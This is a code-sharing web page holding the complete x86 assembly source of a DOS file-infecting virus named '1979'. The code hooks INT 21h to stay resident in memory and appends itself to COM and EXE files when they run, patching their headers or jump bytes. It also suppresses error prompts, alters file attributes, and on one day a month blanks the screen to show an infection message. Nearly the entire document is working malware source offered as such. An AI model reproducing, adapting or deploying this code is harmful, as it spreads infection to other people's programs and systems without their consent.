📄 dos下的1979 virus病毒的代码 .txt
字号:
;*************************************************
;* A Dos computer virus *
;* Name: 1979 virus *
;* Infect com or exe file in Dos system *
;* Completed in May 2 ,2000 *
;*************************************************
;*******************************************
;* Save Registers *
;*******************************************
pushall macro
push ax
push bx
push cx
push dx
push si
push di
push bp
push ds
push es endm
;*******************************************
;* Restore Registers *
;*******************************************
popall macro
pop es
pop ds
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
endm
;*******************************************
;* My Program Start *
;*******************************************
Code Segment
Assume CS:Code,DS:Code
Org 100h
Start:
push ds
push es
call BaseAddr
BaseAddr:
pop si
cmp byte ptr cs:[ComOrExe-BaseAddr][si],EXEFILE
jz NotRestoreFileHeader
mov cx,word ptr cs:[SaveThreeBytes-BaseAddr][si]
mov ds:[100h],cx
mov cl,cs:[SaveThreeBytes+2-BaseAddr][si]
mov ds:[102h],cl
NotRestoreFileHeader:
mov ax,cs
add word ptr cs:[ExecuteOrgFile-BaseAddr+3][si],ax ; Set Original ExeFile Entr
y Point
xor ax,ax
mov ds,ax
mov bx,ds:[21h*4]
push ds:[21h*4+2]
pop ds
cmp byte ptr [bx],90h
jz StopLoading
;**********************************************
;* Modify MCB And Make Room For The Program *
;**********************************************
mov dx,es
dec dx
mov ds,dx
mov ax,ds:[3]
mov bx,(MyVirusSize+15)/16
cmp ax,bx
jb StopLoading
sub ax,bx
mov ds:[3],ax
add dx,ax
inc dx
;*******************************************
;* Load The Code Into Memory *
;*******************************************
push cs
pop ds
mov es,dx
mov bx,si ; Save Base Address
mov cx,MyVirusSize
sub si,BaseAddr-Start
xor di,di
cld
rep movsb
;*******************************************
;* Modify Interrupt Vector Table *
;*******************************************
xor ax,ax
mov ds,ax
push ds:[21h*4]
pop word ptr es:[OldInt21h-100h]
push ds:[21h*4+2]
pop word ptr es:[OldInt21h+2-100h]
mov ax,2521h
sub dx,10h
mov ds,dx
mov dx,offset ResidentPart
int 21h
;-----------------------------------------
StopLoading:
pop es
pop ds
ExecuteOrgFile:
ret
dd 0
;*********************************************************
;* The Following Program Is Resident In Memory *
;*********************************************************
ResidentPart:
nop
cmp ah,4bh
jz GoAhead
jmp cs:OldInt21h
GoAhead:
push ax
push cx
push dx
mov ah,04h
int 1ah
cmp dl,03h
jnz DoNoDamage
;*******************************************
;* You Can Write Damage Code Here *
;*******************************************
mov ax,0600H
mov bh,07h
xor cx,cx
mov dx,184fh
int 10h
mov ah,02H
xor bh,bh
xor dx,dx
int 10h
mov ax,1301h
mov bx,0007h
mov cx,MsgLen
xor dx,dx
push cs
pop es
lea bp,Msg
int 10h
add sp,06h
iret
;*********************************************
;* If It is Not The Right Day,Do No damage *
;*********************************************
DoNoDamage:
pop dx
pop cx
pop ax
;*********************************************
;* Begin To Infect File *
;*********************************************
pushall
mov si,dx
mov cx,0ffffh
UpperCaseString:
cmp byte ptr [si],0
jz Lab7
cmp byte ptr [si],‘a‘
jb Lab8
cmp byte ptr [si],‘z‘
ja Lab8
sub byte ptr [si],20h
Lab8:
inc si
loop UpperCaseString
Lab7:
mov cs:ComOrExe,0
mov cx,4
sub si,4
mov di,offset ComExtension
push cs
pop es
rep cmpsb
jz Lab9
inc cs:ComOrExe
Lab9:
;*********************************************************
;* Restore 21H Interrupt Vector To Use INT 21H Sevice *
;*********************************************************
push ds
xor ax,ax
mov ds,ax
push word ptr cs:[OldInt21h]
pop ds:[21h*4]
push word ptr cs:[OldInt21h+2]
pop ds:[21h*4+2]
;*******************************************
;* Hook 24H To Mask Error Process *
;*******************************************
push ds:[24h*4]
pop word ptr cs:[OldInt24h]
push ds:[24h*4+2]
pop word ptr cs:[OldInt24h+2]
mov ds:[24h*4],offset NewInt24h
mov ax,cs
mov ds:[24h*4+2],ax
pop ds
;*******************************************
;* Modify File Attribute *
;*******************************************
mov ax,4300h
int 21h
jnc Lab6
jmp EndInfection3
Lab6:
push cx ; Remember To Pop It
or cl,cl
jz Lab1
xor cx,cx
mov ax,4301h
int 21h
jnc Lab1
jmp EndInfection2
;*******************************************
;* Open The File *
;*******************************************
Lab1:
mov ax,3d42h
int 21h
jnc Lab2
jmp EndInfection2
;*******************************************
;* Load File Header *
;*******************************************
Lab2:
mov bx,ax
push ds ; Remember To Pop It
push dx ; Remember To Pop It
mov bp,sp
sub bp,60h
mov dx,bp
push ss
pop ds
mov cx,1ch
mov ah,3fh
int 21h
;*******************************************
;* Get The File Size *
;*******************************************
mov ax,4202h
mov cx,0ffffh
mov dx,-4
int 21h
add ax,4
adc dx,0
push ax
push dx
;*******************************************
;* Read Four Last Bytes Of The File *
;*******************************************
mov ah,3fh
mov cx,4
lea dx,[bp+1ch]
int 21h
pop dx
pop ax
;*******************************************
;* Check If The File Is Infected Or Not *
;*******************************************
push cs
pop es
lea si,[bp+1ch]
mov di,offset CheckString
mov cx,4
cld
rep cmpsb
jnz Lab4
jmp EndInfection1
;*******************************************
;* Save The First Three Bytes Of The File *
;*******************************************
Lab4:
mov cx,[bp]
mov word ptr cs:SaveThreeBytes,cx
mov cl,[bp+02h]
mov cs:SaveThreeBytes+2,cl
cmp cs:ComOrExe,EXEFILE
jz InfectExeFile
;*******************************************
;* Deal With ComFile *
;*******************************************
;PUSH_AX_DX:
push ax
push dx
mov byte ptr [bp],0e9h
sub ax,3
mov [bp+1],ax
mov dx,100h
xor ax,ax
jmp WriteCode
;*******************************************
;* Deal With ExeFile *
;*******************************************
InfectExeFile:
mov si,ax ; Compute How Many Bytes Needed To Align Para
and si,0fh
mov cx,16
sub cx,si
and cx,0fh
mov si,cx
add ax,cx
adc dx,0
;PUSH_AX_DX
push ax
push dx
mov cx,16
div cx
sub ax,[bp+08h]
sub ax,16 ; Compute New Code Segment
xchg [bp+16h],ax ; ExChange New Code Segment And Old Code Segment
mov dx,[bp+14h] ; Save Old Entry IP
mov word ptr [bp+14h],100h ; New IP=100h
sub ax,[bp+16h] ; Compute Difference Between Old Segment And New Segment
;*******************************************
;* Append The ExeFile To Align Para *
;*******************************************
push ax
mov cx,si
jcxz WriteCode
mov ah,40h
int 21h
pop ax
;*******************************************
;* Write The Code Into The File *
;*******************************************
WriteCode:
push cs
pop ds
mov byte ptr ExecuteOrgFile,0eah
mov word ptr ExecuteOrgFile+1,dx
mov word ptr ExecuteOrgFile+3,ax
mov dx,100h
mov cx,MyVirusSize
mov ah,40h
int 21h
;*******************************************
;* Modify The ExeFile Header *
;*******************************************
mov ax,4200h
xor cx,cx
xor dx,dx
int 21h
;-------------------------------------------
POP_DX_AX:
pop dx ; Pop To Balance The Stack
pop ax
;-------------------------------------------
cmp cs:ComOrExe,COMFILE
jz Lab10
add ax,MyVirusSize ; Compute How Many Sectors The File Occupied
adc dx,0
mov cx,512
div cx
inc ax
mov [bp+04h],ax
mov [bp+02h],dx
Lab10:
push ss
pop ds
mov ah,40h
mov dx,bp
mov cx,1ch
int 21h
;*******************************************
;* Infection Done *
;*******************************************
EndInfection1:
pop dx
pop ds
EndInfection2:
pop cx
;*******************************************
;* Close The ExeFile *
;*******************************************
mov ah,3eh
int 21h
;*******************************************
;* Restore The File Attribute *
;*******************************************
EndInfection3:
mov ax,4301h
int 21h
;*********************************************
;* Let INT 21H Sevice Points To My Program *
;*********************************************
xor ax,ax
mov ds,ax
mov ds:[21h*4],offset ResidentPart
push cs
pop ds:[21h*4+2]
push word ptr cs:[OldInt24h]
pop ds:[24h*4]
push word ptr cs:[OldInt24h]
pop ds:[24h*4+2]
popall
jmp dword ptr cs:OldInt21h
NewInt24h:
iret
;*******************************************
;* Data Area *
;*******************************************
OldInt21h dd ?
OldInt24h dd ?
VirusCodeOffset dd ?
ComOrExe db ?
ComExtension db ‘.COM‘
Msg db ‘Your Computer Is Infected With 1979 Virus‘,0dh,0ah
MsgLen = $ - Msg
SaveThreeBytes db 1eh,06h,0e8h
CheckString db ‘1979‘
;-----------------------------------------
CheckStringLenght = $ - CheckString
MyVirusSize = $ - Start
COMFILE = 0
EXEFILE = 1
;-----------------------------------------
Code Ends
End Start
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -